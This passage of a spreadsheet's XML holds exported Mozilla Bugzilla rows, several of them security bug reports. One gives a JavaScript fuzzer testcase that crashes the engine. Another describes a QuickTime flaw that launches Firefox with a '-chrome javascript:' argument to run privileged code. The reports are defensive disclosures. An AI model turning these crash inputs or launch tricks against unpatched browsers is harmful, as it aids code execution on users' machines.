          <t>x86_64</t>
        </is>
      </c>
      <c r="M4278" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4278" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4278" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4278" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q4278" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4278" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4278" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T4278" t="n">
        <v>1</v>
      </c>
      <c r="U4278" t="n">
        <v>0</v>
      </c>
      <c r="V4278" t="n">
        <v>18</v>
      </c>
      <c r="W4278" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 79a5b2968d01 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-extra-checks):
function foo() {
  Object.prototype[2] = 2;
  delete Object.prototype[2];
  for (var i = 9; i &lt; 10; i &amp; 1970 &amp; Function ^ (this) ^ (this))
    assertEq([2].concat([3])[0], 2);
} foo();
Backtrace:
Program received signal SIGTRAP, Trace/breakpoint trap.
0x00007ffff7fd1a4e in ?? ()
#0  0x00007ffff7fd1a4e in ?? ()
#1  0x00007fffffffc570 in ?? ()
#2  0xfff9000000000000 in ?? ()
#3  0xfff8800000000002 in ?? ()
#4  0xfff8800000000002 in ?? ()
#5  0x0000000000000000 in ?? ()
rax	0x7ffff4800000	140737295417344
rbx	0x7ffff48fffa0	140737296465824
rcx	0x7ffff7e5c6d0	140737352419024
rdx	0x7fffffffccd0	140737488342224
rsi	0x7ffff6907400	140737330050048
rdi	0x7fffffffc798	140737488340888
rbp	0x7fffffffc868	140737488341096
rsp	0x7fffffffc828	140737488341032
r8	0x1	1
r9	0x7ffff6907420	140737330050080
r10	0x7fffffffc580	140737488340352
r11	0x7ffff6c27960	140737333328224
r12	0x8	8
r13	0x7ffff47fc0b0	140737295401136
r14	0x7ffff7e610c0	140737352437952
r15	0x0	0
rip	0x7ffff7fd1a4e	140737353947726
=&gt; 0x7ffff7fd1a4e:	push   %r10
   0x7ffff7fd1a50:	push   %r9
Marking s-s because this assertion is known to be security-related.</t>
        </is>
      </c>
      <c r="X4278" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4279">
      <c r="A4279" t="n">
        <v>395942</v>
      </c>
      <c r="B4279" t="inlineStr">
        <is>
          <t>2007-09-12 11:11:04 -0700</t>
        </is>
      </c>
      <c r="C4279" t="inlineStr">
        <is>
          <t>QuickTime flaw allows launching default browser with arbitrary parameters on Windows ("quicktime pwns firefox")</t>
        </is>
      </c>
      <c r="D4279" t="inlineStr">
        <is>
          <t>2008-03-20 12:10:02 -0700</t>
        </is>
      </c>
      <c r="E4279" t="n">
        <v>1</v>
      </c>
      <c r="F4279" t="n">
        <v>1</v>
      </c>
      <c r="G4279" t="n">
        <v>3</v>
      </c>
      <c r="H4279" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4279" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4279" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4279" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4279" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4279" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4279" t="inlineStr">
        <is>
          <t>[sg:critical] mitigation for QT Windows flaw. QT popup crash now bug 396228</t>
        </is>
      </c>
      <c r="Q4279" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4279" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4279" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4279" t="n">
        <v>1</v>
      </c>
      <c r="U4279" t="n">
        <v>0</v>
      </c>
      <c r="V4279" t="n">
        <v>72</v>
      </c>
      <c r="W4279" t="inlineStr">
        <is>
          <t>This was reported at the URL in the URL field. QuickTime seems to have a flaw that allows specially crafted files handled by the plugin to launch the default browser with arbitrary parameters. The examples on that site use the QuickTime flaw to launch Firefox with "-chrome javascript:&lt;code&gt;" to execute arbitrary code, assuming your default browser is Firefox.
The fix for bug 384384 would protect us in this case if QuickTime used the correct system APIs to launch the default browser, but they appear to read the .html file association from the registry and launch the browser directly.
The QuickTime plugin should be fixed to a) not allow launching the default browser with arbitrary parameters and b) use the right API to launch the default browser (it's not really clear to me why it needs to do that anyways), but perhaps we can "fix" this particular case from our end.
A cross-platform testcase is available at:
http://people.mozilla.com/~gavin/bug/qt/test.mov
It alerts "Vulnerable" if privileged code was allowed to run.</t>
        </is>
      </c>
      <c r="X4279" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4280">
      <c r="A4280" t="n">
        <v>798045</v>
      </c>
      <c r="B4280" t="inlineStr">
        <is>
          <t>2012-10-04 14:24:46 -0700</t>
        </is>
      </c>
      <c r="C4280" t="inlineStr">
        <is>
          <t>crash in mozilla::net::FailDelayManager::Lookup</t>
        </is>
      </c>
      <c r="D4280" t="inlineStr">
        <is>
          <t>2015-10-16 11:39:02 -0700</t>
        </is>
      </c>
      <c r="E4280" t="n">
        <v>1</v>
      </c>
      <c r="F4280" t="n">
        <v>1</v>
      </c>
      <c r="G4280" t="n">
        <v>3</v>
      </c>
      <c r="H4280" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4280" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4280" t="inlineStr">
        <is>
          <t>Networking: WebSockets</t>
        </is>
      </c>
      <c r="K4280" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L4280" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4280" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4280" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4280" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4280" t="inlineStr">
        <is>
          <t>[blocking bug 711793, but see comment 8][qa-]</t>
        </is>
      </c>
      <c r="Q4280" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4280" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4280" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T4280" t="n">
        <v>1</v>
      </c>
      <c r="U4280" t="n">
        <v>0</v>
      </c>
      <c r="V4280" t="n">
        <v>33</v>
      </c>
      <c r="W4280" t="inlineStr">
        <is>
          <t>It's #114 top browser crasher in 16.0b5 and seems to happen only in Beta versions with this signature: 15.0 or 16.0.
Signature 	arena_dalloc_small | je_free | nsACString_internal::`scalar deleting destructor''(unsigned int) More Reports Search
UUID	c977c9fe-233d-4d8a-a1be-19ea42121004
Date Processed	2012-10-04 19:56:15
Uptime	82347
Last Crash	22.9 hours before submission
Install Age	4.4 days since version was first installed.
Install Time	2012-06-28 10:56:11
Product	Firefox
Version	16.0
Build ID	20120925201946
Release Channel	beta
OS	Windows NT
OS Version	6.1.7600
Build Architecture	x86
Build Architecture Info	GenuineIntel family 6 model 42 stepping 7
Crash Reason	EXCEPTION_BREAKPOINT
Crash Address	0x6e8f01f1
App Notes 	
AdapterVendorID: 0x8086, AdapterDeviceID: 0x0116, AdapterSubsysID: 15ea10cf, AdapterDriverVersion: 8.15.10.2287
D2D? D2D+ DWrite? DWrite+ D3D10 Layers? D3D10 Layers+ 
EMCheckCompatibility	True
Adapter Vendor ID	0x8086
Adapter Device ID	0x0116
Total Virtual Memory	2147352576
Available Virtual Memory	1357484032
System Memory Use Percentage	54
Available Page File	5218824192
Available Physical Memory	1687126016
Frame 	Module 	Signature 	Source
0 	mozglue.dll 	arena_dalloc_small 	memory/mozjemalloc/jemalloc.c:4510
1 	mozglue.dll 	je_free 	memory/mozjemalloc/jemalloc.c:6565
2 	xul.dll 	nsACString_internal::`scalar deleting destructor' 	
3 	xul.dll 	mozilla::net::FailDelayManager::Lookup 	netwerk/protocol/websocket/WebSocketChannel.cpp:218
4 	xul.dll 	mozilla::net::FailDelayManager::DelayOrBegin 	netwerk/protocol/websocket/WebSocketChannel.cpp:229
5 	xul.dll 	mozilla::net::nsWSAdmissionManager::ConditionallyConnect 	netwerk/protocol/websocket/WebSocketChannel.cpp:339
6 	xul.dll 	mozilla::net::WebSocketChannel::OnLookupComplete 	netwerk/protocol/websocket/WebSocketChannel.cpp:2217
7 	xul.dll 	`anonymous namespace'::DNSListenerProxy::OnLookupCompleteRunnable::Run 	netwerk/dns/nsDNSService2.cpp:552
8 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:624
9 	xul.dll 	mozilla::ipc::MessagePump::Run 	ipc/glue/MessagePump.cpp:82
10 	xul.dll 	MessageLoop::RunHandler 	ipc/chromium/src/base/message_loop.cc:201
11 	xul.dll 	MessageLoop::Run 	ipc/chromium/src/base/message_loop.cc:175
12 	xul.dll 	nsBaseAppShell::Run 	widget/xpwidgets/nsBaseAppShell.cpp:163
13 	xul.dll 	nsAppShell::Run 	widget/windows/nsAppShell.cpp:232
14 	xul.dll 	nsAppStartup::Run 	toolkit/components/startup/nsAppStartup.cpp:257
15 	xul.dll 	XREMain::XRE_mainRun 	toolkit/xre/nsAppRunner.cpp:3794
16 	xul.dll 	XREMain::XRE_main 	toolkit/xre/nsAppRunner.cpp:3871
17 	xul.dll 	XRE_main 	toolkit/xre/nsAppRunner.cpp:3947
18 	firefox.exe 	wmain 	toolkit/xre/nsWindowsWMain.cpp:100
19 	firefox.exe 	__tmainCRTStartup 	crtexe.c:552
20 	kernel32.dll 	BaseThreadInitThunk 	
21 	ntdll.dll 	__RtlUserThreadStart 	
22 	ntdll.dll 	_RtlUserThreadStart 	
More reports at:
https://crash-stats.mozilla.com/report/list?signature=arena_dalloc_small+|+je_free+|+nsACString_internal%3A%3A%60scalar+deleting+destructor%27%27%28unsigned+int%29</t>
        </is>
      </c>
      <c r="X4280" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4281">
      <c r="A4281" t="n">
        <v>1167332</v>
      </c>
      <c r="B4281" t="inlineStr">
        <is>
          <t>2015-05-21 12:23:55 -0700</t>
        </is>
      </c>
      <c r="C4281" t="inlineStr">
        <is>
          <t>rx::d3d11::SetBufferData using uninitialized memory</t>
        </is>
      </c>
      <c r="D4281" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:19 -0700</t>
        </is>
      </c>
      <c r="E4281" t="n">
        <v>1</v>
      </c>
      <c r="F4281" t="n">
        <v>1</v>
      </c>
      <c r="G4281" t="n">
        <v>3</v>
      </c>
      <c r="H4281" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4281" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4281" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4281" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L4281" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4281" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4281" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4281" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4281" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q4281" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4281" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4281" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T4281" t="n">
        <v>1</v>
      </c>
      <c r="U4281" t="n">
        <v>0</v>
      </c>
      <c r="V4281" t="n">
        <v>25</v>
      </c>
      <c r="W4281" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows; rv:26.0) Gecko/20100101 Firefox/26.0
Build ID: 20150305021524
Steps to reproduce:
In Firefox 38.0.1, rx::d3d11::SetBufferData uses uninitialized memory at gfx\angle\src\libGLESv2\renderer\d3d\d3d11\renderer11_utils.h line 176.
The problem is that SetBufferData does not check the return value from the Windows function ID3D11DeviceContext::Map at line 174, thus (on failure) leaving untouched whatever was contained in the uninitialized variable mappedResource:
173:    D3D11_MAPPED_SUBRESOURCE mappedResource;
174:    context-&gt;Map(constantBuffer, 0, D3D11_MAP_WRITE_DISCARD, 0, &amp;mappedResource);
175:
176:    memcpy(mappedResource.pData, &amp;value, sizeof(T));
Since mappedResource can contain anything, this bug could make it possible to write data into anywhere in Firefox's address space. Depending on how SetBufferData is used, this bug might be exploitable to disclose sensitive data and/or cause execution of attacker-selected code.</t>
        </is>
      </c>
      <c r="X4281" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4282">
      <c r="A4282" t="n">
        <v>467322</v>
      </c>
      <c r="B4282" t="inlineStr">
        <is>
          <t>2008-12-01 00:26:19 -0800</t>
        </is>
      </c>
      <c r="C4282" t="inlineStr">
        <is>
          <t>buildbot slaves occasionally lose connection to production-master.b.m.o</t>
        </is>
      </c>
      <c r="D4282" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4282" t="n">
        <v>1</v>
      </c>
      <c r="F4282" t="n">
        <v>1</v>
      </c>
      <c r="G4282" t="n">
        <v>5</v>
      </c>
      <c r="H4282" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4282" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4282" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4282" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4282" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4282" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4282" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4282" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4282" t="inlineStr"/>
      <c r="Q4282" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4282" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4282" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4282" t="n">
        <v>1</v>
      </c>
      <c r="U4282" t="n">
        <v>0</v>
      </c>
      <c r="V4282" t="n">
        <v>10</v>
      </c>
      <c r="W4282" t="inlineStr">
        <is>
          <t>Failed red with:
remoteFailed: [Failure instance: Traceback (failure with no frames): &lt;class 'twisted.internet.error.ConnectionLost'&gt;: Connection to the other side was lost in a non-clean fashion.
]
[Failure instance: Traceback (failure with no frames): &lt;class 'twisted.internet.error.ConnectionLost'&gt;: Connection to the other side was lost in a non-clean fashion.
]</t>
        </is>
      </c>
      <c r="X4282" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4283">
      <c r="A4283" t="n">
        <v>900855</v>
      </c>
      <c r="B4283" t="inlineStr">
        <is>
          <t>2013-08-02 00:48:47 -0700</t>
        </is>
      </c>
      <c r="C4283" t="inlineStr">
        <is>
          <t>[Buri][WIFI]It is abnormal when turn on WIFI</t>
        </is>
      </c>
      <c r="D4283" t="inlineStr">
        <is>
          <t>2013-08-27 13:12:47 -0700</t>
        </is>
      </c>
      <c r="E4283" t="n">
        <v>1</v>
      </c>
      <c r="F4283" t="n">
        <v>1</v>
      </c>
      <c r="G4283" t="n">
        <v>6</v>
      </c>
      <c r="H4283" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4283" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4283" t="inlineStr">
        <is>
          <t>Wifi</t>
        </is>
      </c>
      <c r="K4283" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4283" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4283" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4283" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4283" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4283" t="inlineStr"/>
      <c r="Q4283" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4283" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4283" t="inlineStr">
        <is>
          <t>1.1 QE5</t>
        </is>
      </c>
      <c r="T4283" t="n">
        <v>1</v>
      </c>
      <c r="U4283" t="n">
        <v>0</v>
      </c>
      <c r="V4283" t="n">
        <v>25</v>
      </c>
      <c r="W4283" t="inlineStr">
        <is>
          <t>AU_LINUX_GECKO_ICS_STRAWBERRY.01.01.00.019.171
 Firefox os  v1.1
 Mozilla build ID:20130722070207
 DEFECT DESCRIPTION:
 It is abnormal when turn on WIFI
 REPRODUCING PROCEDURES:
 1)switch on wifi-&gt;select and connect a valid AP-&gt;exit the wifi screen;
 2)enter into Internet sharing-&gt;turn on wifi hotspot-&gt;wait about 1min-&gt;the wifi
 hotspot switch off automatically;--&gt;KO1
 3)back to and open wifi-&gt;the screen will show "Searching" always and can't
 search anyone AP--&gt;KO2
 Notes：
 the phone can't search anyone AP unless you restart the phone;
 REPRODUCING RATE:  5/5
 For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X4283" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4284">
      <c r="A4284" t="n">
        <v>674776</v>
      </c>
      <c r="B4284" t="inlineStr">
        <is>
          <t>2011-07-27 17:04:44 -0700</t>
        </is>
      </c>
      <c r="C4284" t="inlineStr">
        <is>
          <t>SIGSEGV while profiling page with many functions (JS debugging)</t>
        </is>
      </c>
      <c r="D4284" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:18 -0700</t>
        </is>
      </c>
      <c r="E4284" t="n">
        <v>1</v>
      </c>
      <c r="F4284" t="n">
        <v>1</v>
      </c>
      <c r="G4284" t="n">
        <v>3</v>
      </c>
      <c r="H4284" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4284" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4284" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4284" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4284" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4284" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4284" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4284" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4284" t="inlineStr">
        <is>
          <t>[sg:critical?] exposed through Firebug [js-triage-done] wanted-standalone-js [qa?]</t>
        </is>
      </c>
      <c r="Q4284" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4284" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4284" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T4284" t="n">
        <v>0</v>
      </c>
      <c r="U4284" t="n">
        <v>0</v>
      </c>
      <c r="V4284" t="n">
        <v>36</v>
      </c>
      <c r="W4284" t="inlineStr">
        <is>
          <t>Created attachment 548978
Generator for reproducer
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Steps to reproduce:
open many66000.html
2) open firebug 
3) do while not crash (and press continue on long running script) 
3a) press "OK"   (in hello box) 
3b) press "profile" 
Actual results:
Process:         firefox-bin [6702]
Path:            /Applications/Firefox.app/Contents/MacOS/firefox-bin
Identifier:      org.mozilla.firefox
Version:         5.0.1 (5.0.1)
Code Type:       X86-64 (Native)
Parent Process:  launchd [185]
Date/Time:       2011-07-27 11:38:37.194 +0200
OS Version:      Mac OS X 10.6.8 (10K540)
Report Version:  6
Interval Since Last Report:          949111 sec
Crashes Since Last Report:           962
Per-App Interval Since Last Report:  12453 sec
Per-App Crashes Since Last Report:   9
Anonymous UUID:                      A20874EC-7280-445C-9882-755000F0127C
Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000127a631ae
Crashed Thread:  0  Dispatch queue: com.apple.main-thread
Thread 0 Crashed:  Dispatch queue: com.apple.main-thread
0   libSystem.B.dylib             	0x00007fff826d7514 tiny_free_list_add_ptr + 124
1   libSystem.B.dylib             	0x00007fff826d4c27 tiny_malloc_from_free_list + 1196
2   libSystem.B.dylib             	0x00007fff826d3abd szone_malloc_should_clear + 242
3   libSystem.B.dylib             	0x00007fff826d398a malloc_zone_malloc + 82
4   libSystem.B.dylib             	0x00007fff826d1c88 malloc + 44
5   libmozalloc.dylib             	0x0000000101ab39ac moz_xmalloc + 12
6   XUL                           	0x00000001009af604 xpc_LocalizeContext(JSContext*) + 75748
7   XUL                           	0x0000000100992f67 DumpJSValue + 81591
8   XUL                           	0x0000000100993826 DumpJSValue + 83830
9   XUL                           	0x00000001009a7639 xpc_LocalizeContext(JSContext*) + 43033
10  XUL                           	0x00000001009a1489 xpc_LocalizeContext(JSContext*) + 18025
11  XUL                           	0x0000000100e3c9c5 nsXPTCStubBase::Stub249() + 533
12  XUL                           	0x0000000100e3b84b NS_InvokeByIndex_P + 955
13  XUL                           	0x0000000100bc52bf JSD_DebuggerOnForUser + 49567
14  ???                           	0x0000000135b72a10 0 + 5196163600
15  ???                           	0x00000001279e5fb0 0 + 4959657904
16  ???                           	0x000000011dfc5a58 0 + 4798044760
17  ???                           	0x000000011fd464a0 0 + 4828980384
18  ???                           	0x000000011da79580 0 + 4792489344
19  ???                           	0x00000001029497d0 0 + 4338259920
20  ???                           	0x000000011fd59540 0 + 4829058368
21  ???                           	0x00000001029a58d0 0 + 4338637008
22  ???                           	0x00000001029a3d20 0 + 4338629920
23  ???                           	0x000000011fd68f10 0 + 4829122320
24  ???                           	0x000000011fd75b70 0 + 4829174640
25  ???                           	0x000000011fd7c6d0 0 + 4829202128
26  ???                           	0x000000011fd84390 0 + 4829234064
27  ???                           	0x000000011fd87550 0 + 4829246800
28  ???                           	0x000000011fd893e0 0 + 4829254624
29  ???                           	0x000000011fd8cee0 0 + 4829269728
30  ???                           	0x000000011fd91780 0 + 4829288320
31  ???                           	0x000000011fdcf590 0 + 4829541776
32  ???                           	0x000000011fdd3060 0 + 4829556832
33  ???                           	0x000000011fdd32f0 0 + 4829557488
34  ???                           	0x000000011fdd38b0 0 + 4829558960
35  ???                           	0x000000011fdd3930 0 + 4829559088
36  ???                           	0x000000011fdd39f0 0 + 4829559280
37  ???                           	0x000000011fdd3c90 0 + 4829559952
38  ???                           	0x000000011fdd3e50 0 + 4829560400
39  ???                           	0x000000011fdd41a0 0 + 4829561248
40  ???                           	0x000000011fdd4260 0 + 4829561440
41  ???                           	0x000000011fdd43a0 0 + 4829561760
42  ???                           	0x000000011fdd46f0 0 + 4829562608
43  ???                           	0x000000011fdd4af0 0 + 4829563632
44  ???                           	0x000000011fdd4d10 0 + 4829564176
45  ???                           	0x000000011fdc42a0 0 + 4829495968
46  ???                           	0x000000011fdd4ff0 0 + 4829564912
47  ???                           	0x000000011fdd5390 0 + 4829565840
48  ???                           	0x000000011fdd5450 0 + 4829566032
49  ???                           	0x000000011fdd57a0 0 + 4829566880
50  ???                           	0x000000011fdd5880 0 + 4829567104
51  ???                           	0x000000011fdd6290 0 + 4829569680
52  ???                           	0x000000011fdd60f0 0 + 4829569264
53  ???                           	0x000000011fdd61d0 0 + 4829569488
54  ???                           	0x000000011fdd6a70 0 + 4829571696
55  ???                           	0x000000011fdd6d20 0 + 4829572384
56  ???                           	0x000000011fdd7580 0 + 4829574528
57  ???                           	0x000000011fdd73f0 0 + 4829574128
58  ???                           	0x000000011fdd74f0 0 + 4829574384
59  ???                           	0x000000011fdd79a0 0 + 4829575584
60  ???                           	0x000000011fdd7d40 0 + 4829576512
61  ???                           	0x000000011fdd7e50 0 + 4829576784
62  ???                           	0x000000011fdd8090 0 + 4829577360
63  ???                           	0x000000011fdd83c0 0 + 4829578176
64  ???                           	0x000000011fdd8540 0 + 4829578560
65  ???                           	0x000000011fdd8670 0 + 4829578864
66  ???                           	0x000000011fdd8860 0 + 4829579360
67  ???                           	0x000000011fdd8f80 0 + 4829581184
68  ???                           	0x000000011fdd9420 0 + 4829582368
69  ???                           	0x000000011fdd8de0 0 + 4829580768
70  ???                           	0x000000011fdd93a0 0 + 4829582240
71  ???                           	0x000000011fdd9d90 0 + 4829584784
72  ???                           	0x000000011fdd9df0 0 + 4829584880
73  ???                           	0x000000011fdd9ed0 0 + 4829585104
74  ???                           	0x000000011fdd9f50 0 + 4829585232
75  ???                           	0x000000011fdda1f0 0 + 4829585904
76  ???                           	0x000000011fdda2d0 0 + 4829586128
77  ???                           	0x000000011fdda620 0 + 4829586976
78  ???                           	0x000000011fdda710 0 + 4829587216
79  ???                           	0x000000011fdda930 0 + 4829587760
80  ???                           	0x000000011fddabc0 0 + 4829588416
81  ???                           	0x000000011fddaf50 0 + 4829589328
82  ???                           	0x000000011fddb060 0 + 4829589600
83  ???                           	0x000000011fddb2b0 0 + 4829590192
84  ???                           	0x000000011fddb570 0 + 4829590896
85  ???                           	0x000000011fddbac0 0 + 4829592256
86  ???                           	0x000000011fddbb60 0 + 4829592416
87  ???                           	0x000000011fddbd60 0 + 4829592928
88  ???                           	0x000000011fddc0e0 0 + 4829593824
89  ???                           	0x000000011fddc370 0 + 4829594480
90  ???                           	0x000000011fddc410 0 + 4829594640
91  ???                           	0x000000011fddca80 0 + 4829596288
92  ???                           	0x000000011fddc830 0 + 4829595696
93  ???                           	0x000000011fddcd00 0 + 4829596928
94  ???                           	0x000000011fddcd60 0 + 4829597024
95  ???                           	0x000000011fddcf00 0 + 4829597440
96  ???                           	0x000000011fddd170 0 + 4829598064
97  ???                           	0x000000011fddda10 0 + 4829600272
98  ???                           	0x000000011fdddae0 0 + 4829600480
99  ???                           	0x000000011fddde00 0 + 4829601280
100 ???                           	0x000000011fdddef0 0 + 4829601520
101 ???                           	0x000000011fdde1c0 0 + 4829602240
102 ???                           	0x000000011fdde380 0 + 4829602688
103 ???                           	0x000000011fdde8b0 0 + 4829604016
104 ???                           	0x000000011fdded90 0 + 4829605264
105 ???                           	0x000000011fddee80 0 + 4829605504
106 ???                           	0x000000011fddf0d0 0 + 4829606096
107 ???                           	0x000000011fddf4c0 0 + 4829607104
108 ???                           	0x000000011fddfc00 0 + 4829608960
109 ???                           	0x000000011fddfd80 0 + 4829609344
110 ???                           	0x000000011fde00f0 0 + 4829610224
111 ???                           	0x000000011fde0200 0 + 4829610496
112 ???                           	0x000000011fde0500 0 + 4829611264
113 ???                           	0x000000011fde0760 0 + 4829611872
114 ???                           	0x000000011fde0a30 0 + 4829612592
115 ???                           	0x000000011fde0af0 0 + 4829612784
116 ???                           	0x0000000102964730 0 + 4338370352
117 ???                           	0x00000001029647d0 0 + 4338370512
118 ???                           	0x000000011fde15b0 0 + 4829615536
119 ???                           	0x000000011fde11a0 0 + 4829614496
120 ???                           	0x000000011e657710 0 + 4804933392
121 ???                           	0x000000011e644630 0 + 4804855344
122 ???                           	0x000000011e37fc30 0 + 4801952816
123 ???                           	0x000000011e39e240 0 + 4802077248
124 ???                           	0x000000011e397090 0 + 4802048144
125 ???                           	0x000000011ea80710 0 + 4809295632
126 ???                           	0x000000011eabb1a0 0 + 4809535904
127 ???                           	0x000000011e1c1c80 0 + 4800126080
128 ???                           	0x000000011e36a480 0 + 4801864832
129 ???                           	0x000000011e358fb0 0 + 4801793968
130 ???                           	0x000000011e359010 0 + 4801794064
131 ???                           	0x000000011e35bd90 0 + 4801805712
132 ???                           	0x000000011e35bdf0 0 + 4801805808
133 ???                           	0x000000011e35c4f0 0 + 4801807600
134 ???                           	0x000000011e35c550 0 + 4801807696
135 ???                           	0x000000011e35c8e0 0 + 4801808608
136 ???                           	0x000000011e35f3f0 0 + 4801819632
137 ???                           	0x000000011e3a0b10 0 + 4802087696
138 ???                           	0x000000011e351160 0 + 4801761632
139 ???                           	0x000000011e3511c0 0 + 4801761728
140 ???                           	0x000000011e352f50 0 + 4801769296
141 ???                           	0x000000011e353fa0 0 + 4801773472
142 ???                           	0x000000011e354050 0 + 4801773648
143 ???                           	0x000000011e356c70 0 + 4801784944
144 ???                           	0x000000011e3440a0 0 + 4801708192
145 ???                           	0x000000011e344140 0 + 4801708352
146 ???                           	0x000000011e3457b0 0 + 4801714096
147 ???                           	0x000000011e345810 0 + 4801714192
